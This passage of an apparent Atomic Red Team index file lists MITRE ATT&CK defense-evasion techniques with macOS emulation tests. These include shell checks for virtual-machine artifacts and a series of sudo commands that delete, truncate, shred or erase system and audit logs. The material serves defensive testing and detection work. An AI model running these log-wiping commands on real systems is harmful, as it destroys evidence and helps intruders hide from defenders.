'1.1' atomic_tests: [] T1036.008: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471 created: '2023-03-08T22:40:06.918Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1036/008 external_id: T1036.008 - source_name: polygot_icedID description: 'Lim, M. (2022, September 27). More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID. Retrieved September 29, 2022.' url: https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-08T17:44:11.183Z' name: Masquerade File Type description: "Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, icon, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is 0xFF 0xD8 and the file extension is either `.JPE`, `.JPEG` or `.JPG`. \n\nAdversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections. \n\nCommon non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. \ Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of test.gif. A user may not know that a file is malicious due to the benign appearance and file extension.\n\nPolyglot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - CrowdStrike Falcon OverWatch - Ben Smith x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.1' atomic_tests: [] T1564: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8 created: '2020-02-26T17:41:25.933Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1564 external_id: T1564 - source_name: Cybereason OSX Pirrit description: Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021. url: https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf - source_name: MalwareBytes ADS July 2015 description: Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018. url: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/ - source_name: Sofacy Komplex Trojan description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ - source_name: Sophos Ragnar May 2020 description: SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020. url: https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:31.407Z' name: Hide Artifacts description: |- Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015) Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - Office Suite - Windows - macOS - ESXi x_mitre_version: '1.4' identifier: T1564 atomic_tests: [] T1484.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee created: '2020-12-28T21:59:02.181Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1484/002 external_id: T1484.002 - source_name: AWS RE:Inforce Threat Detection 2024 description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and techniques for proactive threat detection. Retrieved September 25, 2024. url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf - source_name: CISA SolarWinds Cloud Detection description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021. url: https://us-cert.cisa.gov/ncas/alerts/aa21-008a - source_name: AADInternals zure AD Federated Domain description: Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved September 28, 2022. url: https://o365blog.com/post/federation-vulnerability/ - source_name: Microsoft - Azure AD Federation description: Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020. url: https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed - source_name: Microsoft - Azure Sentinel ADFSDomainTrustMods description: Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020. url: https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml - source_name: Microsoft - Update or Repair Federated domain description: Microsoft. (2020, September 14). Update or repair the settings of a federated domain in Office 365, Azure, or Intune. Retrieved December 30, 2020. url: https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365 - source_name: Okta Cross-Tenant Impersonation 2023 description: 'Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.' url: https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection - source_name: Sygnia Golden SAML description: Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved November 17, 2024. url: https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:32.244Z' name: Domain Trust Modification description: "Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\n\nManipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) \n\nAn adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Blake Strom, Microsoft 365 Defender - Praetorian - Obsidian Security x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Identity Provider - Windows x_mitre_version: '2.2' identifier: T1484.002 atomic_tests: [] T1562.009: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--28170e17-8384-415c-8486-2e6b294cb803 created: '2021-06-23T20:00:27.600Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1562/009 external_id: T1562.009 - source_name: BleepingComputer REvil 2021 description: Abrams, L. (2021, March 19). REvil ransomware has a new ‘Windows Safe Mode’ encryption mode. Retrieved June 23, 2021. url: https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/ - source_name: Cybereason Nocturnus MedusaLocker 2020 description: Cybereason Nocturnus. (2020, November 19). Cybereason vs. MedusaLocker Ransomware. Retrieved June 23, 2021. url: https://www.cybereason.com/blog/medusalocker-ransomware - source_name: Microsoft Bootcfg description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August 30, 2021. url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg - source_name: Microsoft bcdedit 2021 description: Microsoft. (2021, May 27). bcdedit. Retrieved June 23, 2021. url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit - source_name: Microsoft Safe Mode description: Microsoft. (n.d.). Start your PC in safe mode in Windows 10. Retrieved June 23, 2021. url: https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234 - source_name: CyberArk Labs Safe Mode 2016 description: 'Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.' url: https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise - source_name: Sophos Snatch Ransomware 2019 description: Sophos. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved June 23, 2021. url: https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:33.044Z' name: 'Impair Defenses: Safe Boot Mode' description: |- Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019) Adversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021) Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Jorell Magtibay, National Australia Bank Limited - Kiyohito Yamamoto, RedLark, NTT Communications - Yusuke Kubo, RedLark, NTT Communications x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' identifier: T1562.009 atomic_tests: [] T1542.005: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4 created: '2020-10-20T00:06:56.180Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1542/005 external_id: T1542.005 - source_name: Cisco Blog Legacy Device Attacks description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 - source_name: Cisco IOS Software Integrity Assurance - Secure Boot description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020. url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35 - source_name: Cisco IOS Software Integrity Assurance - Image File Verification description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020. url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 - source_name: Cisco IOS Software Integrity Assurance - Command History description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020. url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23 - source_name: Cisco IOS Software Integrity Assurance - Boot Information description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot Information. Retrieved October 21, 2020. url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:33.317Z' name: TFTP Boot description: |- Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Network Devices x_mitre_version: '1.1' atomic_tests: [] T1497.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--29be378d-262d-4e99-b00d-852d573628e6 created: '2020-03-06T20:57:37.959Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1497/001 external_id: T1497.001 - source_name: Unit 42 OilRig Sept 2018 description: Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018. url: https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/ - source_name: McAfee Virtual Jan 2017 description: Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual Machine. Retrieved April 17, 2019. url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/ - source_name: Deloitte Environment Awareness description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved September 13, 2024. url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:33.591Z' name: 'Virtualization/Sandbox Evasion: System Checks' description: "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.\n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: discovery x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Deloitte Threat Library Team - Kostya Vasilkov x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '2.3' identifier: T1497.001 atomic_tests: - name: Detect Virtualization Environment via ioreg auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09 description: 'ioreg contains registry entries for all the device drivers in the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. ' supported_platforms: - macos executor: name: sh elevation_required: false command: 'if (ioreg -l | grep -e Manufacturer -e ''Vendor Name'' | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; ' - name: Detect Virtualization Environment using sysctl (hw.model) auto_generated_guid: 6beae646-eb4c-4730-95be-691a4094408c description: | sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware but will return the hypervisor name (VMware7,0). Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model supported_platforms: - macos executor: name: sh command: 'if [ "$(sysctl -n hw.model | grep -v ''Mac'')" != "" ]; then echo ''Virtualization Environment detected''; fi; ' - name: Check if System Integrity Protection is enabled auto_generated_guid: 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945 description: "The latest versions of macOS have the System Integrity Protection feature (SIP). If a sandbox uses a non-signed \nkernel extension for monitoring purposes the, SIP feature must be disabled to load this kind of kernel extension.\nMalware may check if the SIP is enabled.\nReference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip\n" supported_platforms: - macos executor: name: sh command: 'if [ "$(csrutil status | grep -v ''enabled'')" != "" ]; then echo ''Possible Virtualization Environment detected''; fi; ' - name: Detect Virtualization Environment using system_profiler auto_generated_guid: e04d2e89-de15-4d90-92f9-a335c7337f0f description: "system_profiler provides system hardware and software configuration and the Model Identifier should provide the value similar to (sysctl -n hw.model). \nWe should be able to find whether virtualization is enabled by checking whether the Model Identifier does not contain \"Mac\".\n" supported_platforms: - macos executor: name: sh command: 'if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier" | grep -v ''Mac'')" != "" ]; then echo ''Virtualization Environment detected''; fi; ' T1070.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36 created: '2020-01-28T17:11:54.034Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1070/002 external_id: T1070.002 - source_name: Linux Logs description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must be Monitoring. Retrieved March 29, 2020. url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:34.441Z' name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs' description: | Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs) * /var/log/messages:: General and system-related messages * /var/log/secure or /var/log/auth.log: Authentication logs * /var/log/utmp or /var/log/wtmp: Login records * /var/log/kern.log: Kernel logs * /var/log/cron.log: Crond logs * /var/log/maillog: Mail server logs * /var/log/httpd/: Web server access and error logs kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '1.0' identifier: T1070.002 atomic_tests: - name: rm -rf auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 description: 'Delete system and audit logs ' supported_platforms: - macos - linux input_arguments: syslog_path: description: path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/. type: string default: "/var/log/system.log" macos_audit_path: description: path of audit file to delete type: string default: "/var/audit/20220725213300.202208110700021" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi && stat #{syslog_path} ' get_prereq_command: | touch #{syslog_path} if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi executor: command: | sudo rm -rf #{syslog_path} if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi name: sh elevation_required: true - name: Delete log files using built-in log utility auto_generated_guid: 653d39cd-bae7-499a-898c-9fb96b8b5cd1 description: 'This test deletes main log datastore, inflight log data, time-to-live data(TTL), fault and error content ' supported_platforms: - macos executor: command: | sudo log erase --all sudo log erase --ttl #Deletes only time-to-live log content name: sh elevation_required: true - name: Truncate system log files via truncate utility auto_generated_guid: 6290f8a8-8ee9-4661-b9cf-390031bf6973 description: 'This test truncates the system log files using the truncate utility with (-s 0) parameter which sets file size to zero, thus emptying the file content ' supported_platforms: - macos input_arguments: system_log_path: description: path of system log to delete. type: string default: "/var/log/system.log" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} ' get_prereq_command: 'touch #{system_log_path} ' executor: command: 'sudo truncate -s 0 #{system_log_path} #size parameter shorthand ' name: sh elevation_required: true - name: Delete log files via cat utility by appending /dev/null or /dev/zero auto_generated_guid: c23bdb88-928d-493e-b46d-df2906a50941 description: 'The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility ' supported_platforms: - macos input_arguments: system_log_path: description: path of system log to delete. type: string default: "/var/log/system.log" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} ' get_prereq_command: 'touch #{system_log_path} ' executor: command: | sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros) name: sh elevation_required: true - name: System log file deletion via find utility auto_generated_guid: bc8eeb4a-cc3e-45ec-aa6e-41e973da2558 description: 'This test finds and deletes the system log files within /var/log/ directory using various executions(rm, shred, unlink) ' supported_platforms: - macos input_arguments: system_log_name1: description: name or prefix of system log to delete. type: string default: system.log system_log_name2: description: name or prefix of system log to delete. type: string default: system.log.97.gz system_log_name3: description: name or prefix of system log to delete. type: string default: system.log.98.gz dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3} ' get_prereq_command: 'touch /var/log/#{system_log_name1} /var/log/#{system_log_name2} /var/log/#{system_log_name3} ' executor: command: | sudo find /var/log -name '#{system_log_name1}*' -exec rm {} \; #using "rm" execution sudo find /var/log -name "#{system_log_name2}*" -exec shred -u -z -n 3 {} \; #using "shred" execution sudo find /var/log -name "#{system_log_name3}*" -exec unlink {} \; #using "unlink" execution name: sh elevation_required: true - name: Overwrite macOS system log via echo utility auto_generated_guid: '0208ea60-98f1-4e8c-8052-930dce8f742c' description: 'This test overwrites the contents of system log file with an empty string using echo utility ' supported_platforms: - macos input_arguments: system_log_path: description: path to system.log type: string default: "/var/log/system.log" executor: command: 'sudo echo '''' > #{system_log_path} ' name: sh elevation_required: true - name: Real-time system log clearance/deletion auto_generated_guid: 848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c description: 'This test reads real-time system log file and writes empty string to it, thus clearing the log file without tampering with the logging process ' supported_platforms: - macos executor: command: 'sudo log -f /var/log/system.log | : > /var/log/system.log ' name: sh elevation_required: true - name: Delete system log files via unlink utility auto_generated_guid: 03013b4b-01db-437d-909b-1fdaa5010ee8 description: 'This test deletes the system log file using unlink utility ' supported_platforms: - macos input_arguments: system_log_path: description: path to system.log type: string default: "/var/log/system.log" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} ' get_prereq_command: 'touch #{system_log_path} ' executor: command: 'sudo unlink #{system_log_path} ' name: sh elevation_required: true - name: Delete system log files using shred utility auto_generated_guid: 86f0e4d5-3ca7-45fb-829d-4eda32b232bb description: 'This test overwrites the contents of the log file with zero bytes(-z) using three passes(-n 3) of data, and then delete the file(-u) securely ' supported_platforms: - macos input_arguments: system_log_path: description: path to system.log type: string default: "/var/log/system.log" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} ' get_prereq_command: 'touch #{system_log_path} ' executor: command: 'sudo shred -u -z -n 3 #{system_log_path} ' name: sh elevation_required: true - name: Delete system log files using srm utility auto_generated_guid: b0768a5e-0f32-4e75-ae5b-d036edcf96b6 description: | This test securely deletes the system log files individually and recursively using the srm utility. Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm Refer: https://github.com/khell/homebrew-srm/issues/1 for installation supported_platforms: - macos input_arguments: system_log_path: description: path to system.log type: string default: "/var/log/system.log" system_log_folder: description: path to log parent folder type: string default: "/var/log/" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} #{system_log_folder} ' get_prereq_command: 'mkdir -p #{system_log_folder} && touch #{system_log_path} #{system_log_folder}/system.log ' executor: command: | sudo srm #{system_log_path} #system log file deletion sudo srm -r #{system_log_folder} #recursive deletion of log files name: sh elevation_required: true - name: Delete system log files using OSAScript auto_generated_guid: 810a465f-cd4f-47bc-b43e-d2de3b033ecc description: 'This test deletes the system log file using osascript via "do shell script"(sh/bash by default) which in-turn spawns rm utility, requires admin privileges ' supported_platforms: - macos input_arguments: system_log_path: description: path to system.log type: string default: "/var/log/system.log" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} ' get_prereq_command: 'touch #{system_log_path} ' executor: command: 'osascript -e ''do shell script "rm #{system_log_path}" with administrator privileges'' ' name: sh elevation_required: true - name: Delete system log files using Applescript auto_generated_guid: e62f8694-cbc7-468f-862c-b10cd07e1757 description: | This test deletes the system log file using applescript using osascript via Finder application Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully as part of TCC(Transparency, Consent, and Control) Framework. Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive supported_platforms: - macos input_arguments: system_log_path: description: path to system.log type: string default: "/var/log/system.log" dependency_executor_name: sh dependencies: - description: 'target files must exist ' prereq_command: 'stat #{system_log_path} ' get_prereq_command: 'touch #{system_log_path} ' executor: command: 'osascript -e ''tell application "Finder" to delete POSIX file "#{system_log_path}"'' ' name: sh elevation_required: true T1218.004: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--2cd950a6-16c4-404a-aa01-044322395107 created: '2020-01-23T19:09:48.811Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/004 external_id: 